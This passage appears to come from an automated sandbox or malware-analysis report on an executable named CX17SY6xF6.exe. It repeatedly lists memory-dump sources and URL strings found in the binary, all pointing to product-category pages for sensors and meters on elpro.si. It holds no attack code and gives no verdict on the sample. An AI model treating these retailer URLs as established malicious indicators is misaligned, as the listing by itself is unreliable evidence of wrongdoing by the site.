                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/dodatki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/elektronika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilna-celica/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilni-pin/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/natezna-merilna-celica/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/obrocni-pretvorniki-sile/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/posebni-pretvorniki-sile/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-nagiba/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-sile-napetosti-kompresije/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-tlacne-sile/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, 